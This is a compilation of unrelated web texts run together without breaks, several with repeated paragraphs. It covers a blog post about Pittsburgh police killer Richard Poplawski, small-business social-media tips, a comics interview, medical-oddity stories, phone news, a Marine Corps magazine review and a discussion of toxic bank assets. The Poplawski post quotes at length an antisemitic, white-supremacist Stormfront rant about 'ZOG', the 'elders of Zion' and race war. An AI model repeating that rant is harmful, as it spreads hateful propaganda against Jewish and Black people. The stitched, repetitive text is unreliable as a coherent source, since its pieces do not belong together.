Disclaimer : Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management .
All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works .
FreeRepublic , LLC , PO BOX 9771 , FRESNO , CA 93794
FreeRepublic.com is powered by software copyright 2000 - 2008 John Robinson
Thanks to some sleuth work on the Internet , we 're starting to learn more about Richard Poplawski , the 23 - year - old who killed three police officers yesterday in Pittsburgh , evidently out of fear that his guns were going to be taken away .
It appears that what police may be looking at is a budding white supremacist who frequented one of the most popular neo -Nazi websites and harbored an apocalyptic dread of the federal government .
The Village Voice 's True Crime Report has done a lot of the sleuthing .
The thread of connective tissue involving the evidence they 've uncovered is n't perfectly solid , but the strands are all well connected enough to suggest the general thrust is reasonably accurate .
The key is to look a little harder at the MySpace page of Poplawski's self - described " best friend , " Eddie Perkovic -- the one that contains that anti-Semitic , anti-black racist rant , recommending that folks read David Duke and the Protocols .
You can see Perkovic above , spouting the gun-nut line about how " he was gonna stand by what his forefathers told him to do . "
The page also has links to his " friends " -- including one RichP , whose page has since been mostly wiped out , except for a Paul Reubens booking mugshot .
There 's a high likelihood that this RichP is in fact Poplawski , because Poplawski's StumpleUpon Page -- which features his photo -- also uses a " RichP " moniker .
( We 're in the process of trying to double - check the IPs . )
Well , as it happens , this same RichP has evidently posted at Stormfront.org -- the nation 's most prominent and popular neo -Nazi Website .
( True Crime Report has the links . )
There , he evidently adopted the user name " Braced For Fate " and posted the following :
" Braced For Fate " also posted a long anti-Semitic rant at Stormfront , which we 're printing excerpts from below the fold .
Finally , the Pittsburgh Tribune - Review has some corroboration from other sources that indicates he fits this profile :
Richard Andrew " Pop " Poplawski's ex-girlfriend said he dragged her by the hair and threatened to shoot her .
He slept with a gun under his pillow in a basement room filled with firearms and ammunition , convinced that Jews controlled the media and President Obama was scheming to take away his arsenal , friends and relatives said Saturday .
" He was a violent , abusive man .
He dragged me by the hair , pulling me across the floor .
I saw him choke his own mother .
He was controlling , " said Melissa Gladish , 23 , of Verona , his former girlfriend who received a protection from abuse order against him in 2005 .
She said she had no doubt he would kill someone .
" He was never afraid of anyone .
Once , he accused me of cheating on him , which I did n't do .
He told me he had a gun he kept buried ... and that he would dig it up and get me , " she said .
...
Despite nearly four years of estrangement , Gladish said Poplawski phoned her in the midst of his standoff with police .
" He said , ' I 'm dying .
I 'm dying .
I want you to know that I always loved you .
You 're still my baby , ' " Gladish said .
" I tried to calm him down .
He said he was shot and that he was dying .
He said , ' I 'm lying in a pool of blood . '
Then I heard a lot of noise , like a scuffle , and the phone went dead . "
Finally , his old friend Eddie Perkovic pipes in too :
Perkovic said Poplawski usually was affable and kind , but grew angry recently over fears Obama would outlaw guns .
He said Poplawski owned a bullet - proof vest , an AK - 47 assault rifle and at least seven other weapons , but obtained the firearms legally .
He said Poplawski feared America was " going to see the end of our times . "
Poplawski had little interest in clubs or sports in high school , but was a diehard Penguins fan , Perkovic said .
Another Stanton Heights friend , Aaron Bire , 22 , said Poplawski " talked about Zionists controlling the media and thought Obama had good press because of his race . "
That meshes perfectly with the rant posted by " Braced For Fate " at Stormfront :
Decoding the collapse First , let ’s review a few basic tenets that are commonly espoused here on StormFront : 1 . The federal government , mainstream media , and banking system in these United States are strongly under the influence of - if not completely controlled by - Zionist interest .
2 . An economic collapse of the financial system is inevitable , bringing with it some degree of civil unrest if not outright balkanization of the continental US , civil / revolutionary / racial war , SHTF / TEOTWAKI scenario etc. 2A .
This collapse is likely engineered by the elite Jewish powers that be in order to make for a power and asset grab .
Now , it seems to me that there is a need to reconcile these concepts into a seamless , sensible theory about our near future .
I do n’t think there is any question that item 1 is the truth .
ZOG is .
One can read the list of significant persons in government and in major corporations and see who is pulling the strings .
One can observe the policies and final products and should walk away with little doubt there is Zionist occupation and - after some further research & critical thinking - will discover their insidious intentions .
I also do n’t think there is too much debate about the eventuality of a collapse of economic and social order in this country .
All signs seem to point to a once great nation in the midst its last gasp , suffocating under the weight fiscal irresponsibility .
Poisoned by design by the moral decadence that is a direct byproduct of item 1 .
The purpose of this thread is to tap into the collective knowledgebase of the many bright White Nationalist thinkers that peruse this forum .
Please help me try to determine the most likely scenario so that we may organize ourselves around it and plan for its contingencies .
If we somehow get thoroughly blind - sided at this late stage it is possible that we may never recover .
At the heart of my question is this :
If 1 and 2 are accepted as accurate , what sense does it make for 2A to also be true ?
In other words :
Why , seeing as how the Jews seem to have the nation right where they want it , would they now turn around and destroy it ?
Common perception seems to be that if there is an abrupt collapse of social order then racial awareness among the white population will rise dramatically .
The Jewish media that dictates “ pop culture ” could no longer elevate the negro , and reality would reveal its nature .
Race - mixing would come to a halt overnight .
Consumerism and materialism would cease as the people scrounge for the necessities .
It would make much more sense to keep the population content and therefore apathetic and lethargic than to stir the pot that would at the very least : create a disruption in the agenda , and at the very most : drive the elite from their places of power , which have undoubtedly been sought out and schemed after for decades .
Fortunately , as of right now , the American populace has yet to be fully racially homogenized , has yet to become even close to disarmed , and still would stand a fighting chance to throw off their chains and ensure a worthwhile existence for their children .
It would make more sense , from the perspective of the Zionists , to maintain status quo and continue the drumbeat of miscenegration , continue to sound the horn of liberalism , and continue the march toward a dystrophic society in which they could never be challenged .
...
Do n’t get me wrong .
If a total collapse is what it takes to wake our brethren and guarantee future generations of white children walk this continent , if that is what it takes to restore our freedoms and recapture our land : let it begin this very second and not a moment later .
Let comfort and convenience be damned , and I will welcome the hardship and embrace the pain secure in the knowledge that our people will rise above and overcome our darkest days .
I just am beginning to think that the elders of Zion are too smart to start the war .
Why would they give us the push we need ?
Unless greed and audacity have clouded their minds in the final hour , I just cannot see an engineered abrupt collapse scenario .
We , the people , are not ripe to be picked from the tree of liberty .
Not just yet .
If disturbed at this juncture , the seeds of racial purity will fall again on this land and take root .
Our enemies know it .
They ’ve got to .
More as we learn it .
Samir Balwani is an emerging technology strategist at Morpheus Media , a firm specializing in Social Marketing , SEM , and SEO .
You can follow him on Twitter @samirbalwani and get his newsletter .
One of the biggest misconceptions with online marketing is that social media is only for large brands .
Truthfully , a small business that invests its time wisely can improve customer ( or client ) loyalty and traditional word of mouth marketing efforts .
Social media is useful for almost every type of business .
Cafes , retail stores , and even professional services can build their online reputation and increase trust .
By taking advantage of social media , businesses can make themselves more accessible , more personable , and maintain long term connections .
For a small business looking to increase referrals , social media can be a powerful tool .
Here are five ways small businesses can capitalize on this new form of marketing .
Why use social media ?
The best way to illustrate why small businesses are using social media is with a story .
Think back to the days of the wild west .
In those days , towns had one general store , and the store owner knew everyone .
People trusted him and knew what they were getting .
Enter the industrial age , and efficiency trumped personalization .
People did n't mind where they bought from , as long as goods were cheap .
Now , that mentality has changed .
Consumers are once again reverting to a need for personalization from businesses large and small .
The need has been rekindled by the Internet and our ability to find anything we want , as well as a mistrust of advertising ( think used cars salesmen ) .
We 've reached a point where the consumer wants to know the store owner 's name and that he can be trusted .
Small businesses must look beyond their want to grow into corporations , and instead focus on their core customers .
Thanks to social media , we 're able to foster these relationships easily and quickly .
Big Win 1 : Local Social Networks
For local businesses with a storefront , sites like Yelp can make a real impact .
Yelp allows businesses to create listings with all the necessary information for a consumer to find you , while other customers can review and comment on your business .
Many of these sites will let business owners " claim " their listings and add information , such as phone numbers , store hours , menus , etc .
Consumers use local social networks to find businesses , but also to get social proof when making a decision .
They use comments and reviews to go with the " best " listing .
Because of the demographic these sites target ( people ready to make a decision ) small businesses can see a great return from local social networks .
Big Win 2 : Blog or Social Hub
When most businesses begin a social media campaign , they tend to focus on Facebook , Twitter , and other social sites .
They usually forget to incorporate their own site and tie their social profiles together .
Our second big win , is the creation of a blog or social hub .
Why push your consumers to connect with you on other sites , but not give them a reason to visit yours ?
Building and writing a blog may be time consuming , but it creates a way to connect with users on your own website .
Additionally , creating useful content such as how - tos or industry insights can keep customers engaged .
For business owners that do n't have the resources to update their blog regularly or can't think of what they 'd write , I suggest building a " Connect " page .
A connect page , or social hub , offers readers a way to find your business ' most active profiles and join you on those social sites .
The page could also include a short bio or how you use each social site .
Giving consumers a reason to visit your site is extremely important .
A blog or social hub can pull consumers to your site and into the sales funnel .
Big Win 3 : Twitter
Everyone is talking about Twitter .
So why is it a big win ?
Simple : it connects you with your consumers in real - time via the web , desktop applications , and even mobile .
Finding a way to offer value while humanizing the business can lead to a stronger following and increased word of mouth marketing .
A great example is CoffeeGroundz , a small coffee shop in Houston , Texas .
The author of their Twitter account is charismatic and his commitment to customer service has drawn a lot of attention to his business .
By being engaging and interacting with the community @CoffeeGroundz has been able to double their clientele .
Big Win 4 : Facebook Fan Page
With Twitter , business owners are able to cater to their consumer 's needs instantaneously .
In a world where everything needs to be done yesterday , a quick response can create a lifelong customer .
Another major social site to target is Facebook .
Creating a Fan Page is simple , but truly utilizing it to its fullest potential takes some guidance .
A Fan Page allows a business to visualize and build a community , similar to Twitter .
However , unlike Twitter , you can add and customize a great deal more .
At the very least a business should update their Fan Page " status " to keep consumers informed and engaged .
A more advanced technique would be to add things like coupons or Google maps directions to the storefront .
These kind of resources give consumers a reason to visit the Page and interact with the brand .
Big Win 5 : Custom Wiki
My final tip is to use a custom wiki , which takes advantage of a phenomenon called crowdsourcing .
In other words , use your customers to give information to other consumers .
The easiest way to do this is by creating a wiki for your FAQ or Customer Service knowledge base .
Let your consumers enter the problems they 've had via a public forum ( the wiki ) , and provide your responses publicly as well .
Although showing problems may seem backwards , it 's a very effective way to retain customers and generate new sales .
Consumers are n't stupid , they know that mistakes happen .
Instead , they want to see that their questions will be answered quickly .
Also , with a public wiki , customers can see if a concern has already been addressed , saving time for both you and the customer .
With minimal moderation , a wiki can build trust in your business and make your customer service more efficient .
More social media resources from Mashable :
Images courtesy of iStockphoto , Aleza and Flickr user meer
Talk about your matches made in hell .
DC Comics ' interstellar maestro of mayhem Lobo – who never saw a planet or person he did n't like ( to annihilate ) – will rip it up in a two - issue miniseries written by Anthrax guitarist and co-founder Scott Ian .
" Obviously , I do n't just commit murder when I do n't like something , but I understand Lobo 's attitude very well , having been in a metal band almost my whole life , " Ian told Wired.com by phone from Los Angeles .
" And I thought that writing it was going to be hard , but it felt more natural writing Lobo 's dialogue than lyrics . "
For the uninitiated , Lobo is DC Comics ' foul - mouthed space mercenary originally created by Roger Slifer and Keith Giffen in the ' 80s as a lampoon of ultraviolent characters like The Punisher and Wolverine .
Lobo experienced a revival as an antiheroic death - bringer in the '90s , and from there " The Main Man , " as he is wont to call himself , quickly went viral in comics and onscreen , raining destruction at every destination .
( Want to spend a few minutes laughing your ass off ?
Read Lobo's Wikipedia bio . )
Ian 's Lobo : Highway to Hell , penned by Lobo vet and The Maxx creator Sam Kieth , arrives in November .
Ian says it 's an apt marriage that 's going to end in a fraggin ' mess .
" It was like letting a kid loose in Toys R Us , " Ian said .
" There 's a frenetic energy to Sam 's style that mixes perfectly with my own .
And he 's really captured Lobo in the past .
I 'm a big fan of his work . "
For those who abhor violence , which itself evidently abhors a vacuum , check out the riotous but kid - safe battle between the Man of Steel and The Main Man in this clip from underrated '90s show Superman : The Animated Series :
On the musical tip , Ian 's still - kicking Anthrax is set to release the ironically titled Worship Music , its first studio album in six years , later this fall .
The band 's latest lineup features new lead vocalist Dan Nelson , as well as bassist Frank Bello , drummer Charlie Benante and lead guitarist Rob Caggiano .
Anthrax hits the road in support of the release this summer with Slipknot , and Lobo - like madness is expected .
Which makes sense .
" He 's the most extreme character in comics , and shares a common attitude with metal , " Ian said .
" He was my natural choice , because he lives by no rules or regulations . "
See also :
The Man Who Can't Get Fat
He used to be a chubby child , but at age 12 the fat dropped off " almost over night " .
He initially tried to eat more to gain weight , but it had no effect .
Mr Perry , of Ilford in Essex , endured a decade of tests before the illness was diagnosed .
It finally emerged that his body produces six times the normal level of insulin .
Doctors have admitted that the condition would be a " slimmer 's dream " .
The Man Who Does n't Feel Cold
Mr Perry , 59 , can eat whatever he likes - including unlimited pies , burgers and desserts - and never get fat .
He can not put on weight because of a condition called lipodystrophy that makes his body rapidly burn fat .
He used to be a chubby child , but at age 12 the fat dropped off " almost over night " .
He initially tried to eat more to gain weight , but it had no effect .
Mr Perry , of Ilford in Essex , endured a decade of tests before the illness was diagnosed .
It finally emerged that his body produces six times the normal level of insulin .
Doctors have admitted that the condition would be a " slimmer 's dream " .
Scientists can't really explain it , but the 48 - year - old Dutchman is able to withstand , and even thrive , in temperatures that could be fatal to the average person .
Dutchman Wim Hof , also known as the Iceman , is the man that swam under ice , and stood in bins filled with ice .
He climbed the Mt. Blanc in shorts in the icy cold , harvested world records and always stands for new challenges .
Scientists can't really explain it , but the 48 - year - old Dutchman is able to withstand , and even thrive , in temperatures that could be fatal to the average person .
The Boy Who Could n't Sleep : stayed awake 24 hours a day for years .
Rhett is awake nearly 24 hours a day , and his condition has baffled his parents and doctors for years .
They took clock shifts watching his every sleep - deprived mood to determine what ailed the young boy .
After a number of conflicting opinions , Shannon and David Lamb finally learned what was wrong with their child : Doctors diagnosed Rhett with an extremely rare condition called chiari malformation .
" The brain literally is squeezed into the spinal column .
What happens is you get compression , squeezing , strangulating of the brain stem , which has all the vital functions that control sleep , speech , our cranial nerves , our circulatory system , even our breathing system , " Savard said .
Rhett Lamb is often cranky like any other 3 - year - old toddler , but there 's one thing that makes him completely different : he has a rare medical condition in which he can't sleep a wink .
Rhett is awake nearly 24 hours a day , and his condition has baffled his parents and doctors for years .
They took clock shifts watching his every sleep - deprived mood to determine what ailed the young boy .
After a number of conflicting opinions , Shannon and David Lamb finally learned what was wrong with their child : Doctors diagnosed Rhett with an extremely rare condition called chiari malformation .
"
The brain literally is squeezed into the spinal column .
What happens is you get compression , squeezing , strangulating of the brain stem , which has all the vital functions that control sleep , speech , our cranial nerves , our circulatory system , even our breathing system , " Savard said .
The Girl Who is Allergic to Water .
Ashleigh , from Melbourne , Australia , is allergic to water of any temperature , a condition she 's lived with since she was 14 .
She suffers from an extremely rare skin disorder called Aquagenic Urticaria - so unusual that only a handful of cases are documented worldwide .
Teenager Ashleigh Morris can't go swimming , soak in a hot bath or enjoy a shower after a stressful day 's work - she 's allergic to water .
Even sweating brings the 19 - year - old out in a painful rash .
Ashleigh , from Melbourne , Australia , is allergic to water of any temperature , a condition she 's lived with since she was 14 .
She suffers from an extremely rare skin disorder called Aquagenic Urticaria - so unusual that only a handful of cases are documented worldwide .
The Woman Who Can't Forget .
McGaugh and fellow UCI researchers Larry Cahill and Elizabeth Parker have been studying the extraordinary case of a person who has " nonstop , uncontrollable and automatic " memory of her personal history and countless public events .
If you randomly pick a date from the past 25 years and ask her about it , she 'll usually provide elaborate , verifiable details about what happened to her that day and if there were any significant news events on topics that interested her .
She usually also recalls what day of the week it was and what the weather was like .
The 40 - year - old woman , who was given the code name AJ to protect her privacy , is so unusual that UCI coined a name for her condition in a recent issue of the journal Neurocase : hyperthymestic syndrome .
That 's the story of AJ , an extraordinary 40 - year - old married woman who remembers everything .
McGaugh and fellow UCI researchers Larry Cahill and Elizabeth Parker have been studying the extraordinary case of a person who has " nonstop , uncontrollable and automatic " memory of her personal history and countless public events .
If you randomly pick a date from the past 25 years and ask her about it , she 'll usually provide elaborate , verifiable details about what happened to her that day and if there were any significant news events on topics that interested her .
She usually also recalls what day of the week it was and what the weather was like .
The 40 - year - old woman , who was given the code name AJ to protect her privacy , is so unusual that UCI coined a name for her condition in a recent issue of the journal Neurocase : hyperthymestic syndrome .
The Girl Who Eats Only Tic Tacs .
For reasons that doctors are unable to explain , Tic tacs are the only thing she can stomach , meaning she has to get the rest of her sustenance from a specially formulated feed through a tube .
Eet Natalie Cooper , a 17 - year - old teenager who has a mystery illness that makes her sick every time she eats anything .
Well , almost anything .
She can eat one thing that does n't make her sick :
Tic tac mint !
For reasons that doctors are unable to explain , Tic tacs are the only thing she can stomach , meaning she has to get the rest of her sustenance from a specially formulated feed through a tube .
The Musician Who Can't Stop Hiccupping .
Mr Sands , who is a backing singer in the group Ebullient , said the condition has hampered his career as he has only been able to perform four times .
In the next couple of weeks -- as of the day of the report -- , doctors at Nottingham 's Queen 's Medical Centre will put a tube into his stomach to monitor acid levels and decide if keyhole surgery is possible .
Chris Sands , 24 , from Lincoln , hiccups as often as every two seconds - and sometimes even when he is asleep .
He has tried a variety of cures , including hypnosis and yoga , but nothing has worked .
Mr Sands thinks his problem stems from an acid reflux condition caused by a damaged valve in his stomach .
" If the acid levels are severe enough they are going to do keyhole surgery and grab part of my stomach and wrap it around the valve to tighten it , " he said .
Mr Sands , who is a backing singer in the group Ebullient , said the condition has hampered his career as he has only been able to perform four times .
In the next couple of weeks -- as of the day of the report -- , doctors at Nottingham 's Queen 's Medical Centre will put a tube into his stomach to monitor acid levels and decide if keyhole surgery is possible .
The Girl That Collapses Every Time She Laughs .
Kay Underwood , 20 , has cataplexy , which means that almost any sort of strong emotion triggers a dramatic weakening of her muscles .
Exhilaration , anger , fear , surprise , awe and even embarrassment can also cause sufferers to suddenly collapse on the spot .
Kay , of Barrow - upon - Soar , Leicestershire ( UK ) , who was diagnosed with the condition five years ago , once collapsed more than 40 times in a single day .
She said : " People find it very odd when it happens , and it is n't always easy to cope with strangers ' reactions . "
Like most cataplexy sufferers , Ms Underwood is also battling narcolepsy - a condition that makes her drop off to sleep without warning .
Narcolepsy affects around 30,000 people in the UK and about 70 per cent of them also have cataplexy .
The Woman Who is Allergic to Modern Technology .
For most people talking on a mobile phone , cooking dinner in the microwave or driving in a car is simply part of modern living in 21st century Britain .
But completing any such tasks is impossible for Debbie Bird - because she is allergic to Cell Phones and Microwaves .
The 39 - year - old is so sensitive to the electromagnetic field ( emf ) or ' smog ' created by computers , mobile phones , microwave ovens and even some cars , that she develops a painful skin rash and her eyelids swell to three times their size if she goes near them .
As a consequence , Mrs Bird , a health spa manager , has transformed her home into an EMF - free zone to try and stay healthy .
' I can no longer do things that I used to take for granted , ' Mrs Bird said .
" My day - to - day life has been seriously affected by EMF " .
Disturbingly he seems quite at home with it too !
St Thekla was a follower of St Paul who lived in Rome and who was put to death under the Emperor Diocletian at the beginning of the 4th Century and who was subsequently made a saint but little else is known of her .
T- Mobile is set to launch two new devices running on the Google Android platform early next year .
The wireless carrier will introduce a home phone and a tablet computer , both powered by Google 's mobile operating system .
Confidential documents cited by The New York Times suggest that alongside its current offering of Google Android devices ( T - Mobile G1 and soon the G2 ) , T - Mobile will venture into unchartered waters with a home phone and a small form factor tablet computer , also powered by Google 's mobile OS .
The home phone from T - Mobile is said to plug into a docking station and also come with another device used to synchronize data while it recharges the battery .
The tablet computer will feature a seven - inch touchscreen and wo n't have any physical keyboard .
T- Mobile was the first wireless carrier in the world to launch a Google Android phone -- the T - Mobile G1 .
Despite starting off slowly , Android gained user traction and more mobile phone manufacturers committed to building devices using it .
The wireless carrier will launch the T - Mobile G2 , its second iteration of the Google phone later on this year .
After delaying its Android offering , Samsung is also set to launch several new Google devices , the first one reportedly coming out in June .
Motorola is building an Android phone as well , with an expected launch date sometime in October .
xoxoxoBruce
The future is unwritten
Join Date : Oct 2002 Posts : 70,968
May 28 , 2009 : Carcoon
You finally talked that object of your lust into going back to your place .
So hand in hand , you walk ( float ) back to your car , but when you turn the corner ...
Quote :
The car was mistaken as food by spindle ermine larvae , which had already begun to strip a nearby tree of its leaves .
Spindle ermines weave silk webs to protect themselves from birds and wasps , allowing them to gorge on leaves for six
weeks before transforming into butterflies .
link
It took a while , actually quite awhile , but it was worth it .
You finally talked that object of your lust into going back to your place .
So hand in hand , you walk ( float ) back to your car , but when you turn the corner ... Cheer up , it 'll only be six weeks , then you can impress your beloved with butterflies .
__________________
The descent of man ~ Nixon , Friedman , Reagan , Trump .
The Marines on warfare , intelligence , close air support and Maslow
The June issue of the Marine Corps Gazette offers a nice representative slice of the Corps and the U.S. military eight years into the 9/11 era .
Some of the eternal verities are mixed with observations from contemporary events .
“ The nature of warfare remains unchanged , ” states a nice far subhed on page 12 .
It is possible that this phrase appears at least once in each issue of the Gazette .
Really , they should just make it the magazine ’s motto .
It is a key point of Marine Corps culture that technology changes but that warfare does n’t , because it is fundamentally about people , not about machines .
Hence derivative phrases such as “ In the Marines we do n’t man the equipment , we equip the man . ”
“ IN YOUR WORLD FAILURE IS NOT AN OPTION , ” states a dumbass Panasonic advertisement on the facing page .
I do n’t blame this page on the Marines , of course .
But the claim made here is becoming one of my pet peeves .
Actually , failure is an option , and the sooner we recognize that , the better decisions we are likely to make in avoiding it .
The magazine bounces back with a good article about having an intelligence cell at the company level .
I was pleased to see this because I ’ve noticed in Iraq that good units have such cells , whether formally mandated by higher headquarters or informally cobbled together by a perceptive company commander who recognized the need and made it happen .
“ If a battalion is operating in a distributed environment the companies will never be satisfied with the level of battalion - level intelligence support , ” observe Lt. Col.
Morgan Mann and Capt. Michael Driscoll .
They also point out that company - level intelligence cells are best staffed by Marines who display “ Curiosity , ‘ street smarts , ’ and effective written and oral communication ” skills .
They also point to one of the eternal verities : “ Every patrol needs to be debriefed . ”
Another key tenet of Marine culture is invoked in a discussion of the new F - 35 that argues that the Marines are the only service that provides good fixed - wing close air support .
( At least , that is what I think is meant by the sentence , “ It was ironic that the Marine Corps was the only Service in the world that still practiced the ‘ tactical air force ’ model perfected in WWII . ” )
Of course , no contemporary military discussion would be complete without a nod to Maslow ’s hierarchy of human needs .
In the letters section , Lt. Col. Stuart Harness discusses Maslow and counterinsurgency :
Maslow ’s hierarchy was never meant to be a counterinsurgency theory prescribing a methodical approach starting at the bottom of the pyramid .
The main failure was not a flawed understanding or misapplication of Maslow ’s theory but a failure to comprehend the nonkinetic effects of our own actions .
Simply put , we achieved when we stopped alienating the tribes and incorporated them into our counterinsurgency efforts . ”
( Full disclosure : When I was a child , Professor Maslow took me canoeing on the Charles River at party thrown by the Brandeis University psychology department .
I also have a vague memory that he had a dog named Chumley , but I am reaching back nearly five decades .
Anyway , perhaps this is why these days I seek self - actualization in whitewater kayaking and hanging out with Labrador Retrievers . )
breezedebris/ flickr
Icons for Interaction
30 Jun 2009
Last week I had the pleasure of attending @media 2009 in London , where it has to be said , I had the best conference experience I ’ve had for a long time .
I prefer the more cosy nature of the event - a single track , not too large and overwhelming quantity of people , and simply great talks .
I ca n’t pick one favourite presentation , as I came away feeling really inspired and energised by everything .
It was also the last @media curated by Patrick Griffiths , who is moving on to follow other passions ( from next year the conference will be in the able hands of the Web Directions Team ) .
I want to take this opportunity to thank Patrick for encouraging me to talk , and giving the best possible environment to do it in .
After giving the presentation , I realised that there are 2 areas , only touched on briefly here , that should be expanded on : Icon Accessibility and Icon Usability Testing .
Those are big topics for another day / talk / blog post , so until then here are my slides for my talk on ‘ Icons for Interaction ’ :
Download the Icons for Interaction PDF ( 18 mb ) .
All links are available on my delicious account , tagged icondesigntalk .
My speaking notes are also included in the PDF , hopefully this will be enough to make the slides meaningful .
The typeface I used for this was Comic Crafts Astronauts in Trouble .
An interesting article on an interesting academic paper , and at least one blog post expressing reservations about the paper ’s conclusions .
First , the article ( I like “ crap assets ” as an alternative to “ toxic assets ” : far preferable to the ridiculous “ legacy assets ” ) :
Geithner Wrong , Crap Assets Correctly Priced , Say Harvard And Princeton Profs John Carney | The Business Insider | Apr. 6 , 2009
The government ’s official view that toxic assets are incorrectly priced due to illiquidity “ fire sales ” is wrong , a new study by Harvard and Princeton finance professors suggests . …
The striking conclusion is that the low prices of toxic assets actually reflect the fundamentals , rather than being driven by an illiquidity discount .
“ The analysis of this paper suggests that recent credit market prices are actually highly consistent with fundamentals .
A structural framework confirms that bonds and credit derivatives should have experienced a significant repricing in 2008 as the economic outlook darkened and volatility increased .
The analysis also confirms that severe mispricing existed in the structured credit tranches prior to the crisis and that a large part of the dramatic rise in spreads has been the elimination of this mispricing . ”
This contrasts sharply with the analysis that underlies most of the financial rescue programs launched by the Federal Reserve and the Treasury Department .
The white paper released to support the Private - Public Investment Partnerships , the program that seeks to encourage private firms to buy toxic assets with government subsidized loans , took the opposite point of view .
“ Troubled real estate - related assets comprised of legacy loans and securities , are at the center of the problems currently impacting the U.S. financial system …
The resulting need to reduce risk triggered a wide - scale deleveraging in these markets and led to fire sales , ” the Treasury and the Fed claimed .
Many prominent economists –including such diverse types as Anna Schwartz and Paul Krugman –have taken with this official view , saying the government was mistaking a solvency crisis for a liquidity crisis .
This latest paper effectively demolishes the “ fire sale ” view .
It draws three important conclusions .
*
Many banks are now insolvent .
“ … many major US banks are now legitimately insolvent .
This insolvency can no longer be viewed as an artifact of bank assets being marked to artificially depressed prices coming out of an illiquid market .
It means that bank assets are being fairly priced at valuations that sum to less than bank liabilities . ”
* Supporting markets in toxic assets has no purpose other than transfering money from taxpayers to banks .
“ … any taxpayer dollars allocated to supporting these markets will simply transfer wealth to the current owners of these securities . ” *
We ’re making it worse .
“ … policies that attempt to prevent a widespread mark - down in the value of credit - sensitive assets are likely to only delay — and perhaps even worsen — the day of reckoning . ”
In short , the government cannot save the banks by improving liquidity or changing mark to market rules because the problem is n’t illiquidity or accounting .
The problem is that highly leveraged financial firms own assets that are worth far less than they thought they would be , and the firms are insolvent as a result .
This is why the latest bailout plans secretly give huge subsidies to banks –because the only way to keep the insolvent zombies afloat is to transfer billions of dollars to banks , bank stockholders , and bank creditors .
The alternative–allowing the insolvent banks to fail , seizing the assets , wiping out shareholders , giving bond holders a serious haircut–is still not on the official agenda .
Next , the interesting paragraphs from the academic paper ( which appears to be online only in pdf form – I had to do some reformatting / retyping ; this might be the first place where a good chunk of it appears in searchable html form , though I could be wrong ) :
Policymakers are rapidly moving towards using TARP money to purchase toxic assets — primarily tranches of collateralized debt obligations ( CDOs ) — from banks , with the aim of supporting secondary markets and increasing bank lending .
The key premise of current policies is that the prices for these assets have become artificially depressed by banks and other investors trying to unload their holdings in an illiquid market , such that they no longer reflect their true hold - to - maturity value .
By purchasing or insuring a large quantity of bank assets , the government can restore liquidity to credit markets and solvency to the banking sector .
The analysis of this paper suggests that recent credit market prices are actually highly consistent with fundamentals .
A structural framework confirms that bonds and credit derivatives should have experienced a significant repricing in 2008 as the economic outlook darkened and volatility increased .
The analysis also confirms that severe mispricing existed in the structured credit tranches prior to the crisis and that a large part of the dramatic rise in spreads has been the elimination of this mispricing .
If prices currently coming out of credit markets are actually correct , and not reflecting fire sales , this has several important implications .
First , correct prices in the secondary market for these assets essentially imply that many major US banks are now legitimately insolvent .
This insolvency can no longer be viewed as an artifact of bank assets being marked to artificially depressed prices coming out of an illiquid market .
It means that bank assets are being fairly priced at valuations that sum to less than bank liabilities .
In turn , any positive valuation assigned by shareholders to their equity claim arises solely from their anticipation of value transfer from firm debtholders or resource transfers from US taxpayers .
Second , if current market prices are fair , any taxpayer dollars allocated to supporting these markets will simply transfer wealth to the current owners of these securities .
To the extent that these assets reside in banks that are now insolvent , the owners are essentially the bondholders of these banks .
The reason their bonds are currently trading far below par is that the assets backing up their claim are just not worth enough ( nor expected to become worth enough when their bonds mature ) to repay them .
And so while they will be cheered by any government overpayment for the toxic assets backing up their claims , their happiness will be at the taxpayers ’ expense since — to the extent that current prices are fair — they will be receiving more than fair value for their investments .
Similarly , using government resources to support these markets by insuring assets against further losses amounts to providing insurance at premia that are significantly below what is fair for the risks that the US taxpayer will now bear .
Third , the market for securitized claims is not going to operate the same way it did in the past .
Investors in these assets are setting prices in the secondary market that reflect both the high expected losses of the securities and the highly systematic nature of these expected losses .
And while the pricing of these securities is dramatically different from the way it was a year or two ago , this is because it was wrong then , not now .
Efforts to restart this market are focused on resuming the flawed pricing of the past , when there was no charge for risk and investors relied on the accuracy of ratings .
Investors have learned from their mistakes and now seem t
o be pricing these securities in accordance with their true risks .
Read the full paper .
Finally , a sharply dissenting view from the blog Economics of Contempt ; his point is that the paper ’s analysis is not of mortgage - backed securities , yet it claims to draw conclusions about them :
The introduction states :
On March 23 , 2009 , the Treasury announced that the TALF plan will commit up to $ 1 trillion to purchase legacy structured credit products .
The government ’s view is that a disappearance of liquidity has caused credit market prices to no longer reflect fundamentals . …
The main objective of this paper is to determine whether … fire sales are required to explain prices currently observed in credit markets .
Sounds like the paper is going to examine the prices of the toxic assets that the Treasury is planning to buy , right ?
Wrong .
Instead , the authors examine investment grade corporate credit risk , using the CDX .
NA.IG index .
But ABS and CDOs backed by investment grade corporate bonds are not eligible for either the TALF or the PPIP .
In other words , investment grade corporate bonds are n’t considered “ toxic assets . ”
The authors conclude that market prices of investment grade corporate credit risk are accurate — which is n’t surprising , seeing as the CDX .
NA.IG is the most liquid contract in the CDS market .
Amazingly , however , the authors use this to conclude that the Treasury ’s plan to buy up the banks ’ toxic assets is misguided …
Are they serious ?
The Treasury is arguing that the prices for mortgage - related securities are artificially depressed because of illiquidity and fire sales .
No one is arguing that investment grade corporates are underpriced due to illiquidity and fire sales .
That ’s why ABS and CDOs backed by investment grade corporates are n’t eligible for the TALF or the PPIP .
The fact that prices for tranches of CDOs backed by investment grade corporates are accurate is completely irrelevant to whether prices for mortgage - related securities are accurate .
Read the full blog post ( though I ’ve given you most of it ) .
The criticism seems sound , but what ’s interesting is the very suggestion that the “ firesale ” scenario is imaginary .
If they are right ( even if the blogger is right that their evidence does n’t support their conclusion ) , then the bailout represents a huge transfer of wealth from ordinary folks ( I hate the term “ taxpayers ” ) to shareholders and bondholders .
If anyone has a better grip on this than I do , please leave enlightening comments .
Share this : Email
Google
Facebook
Reddit
LinkedIn
Twitter
Print
Faber College has one frat house so disreputable it will take anyone .
It has a second one full of white , anglo - saxon , rich young men who are so sanctimonious no one can stand them except Dean Wormer .
The dean enlists the help of the second frat to get the boys of Delta House off campus .
The dean 's plan comes into play just before the homecoming parade to end all parades for all time .
Written by John Vogel < jlvogel@comcast.net >
Ian O'Neill at Astroengine posted this stunning bit of video featuring Arizona State Senator Sylvia Allen .
It 's not that she says the Earth is 6000 years old -- twice , just to make sure -- that floors me .
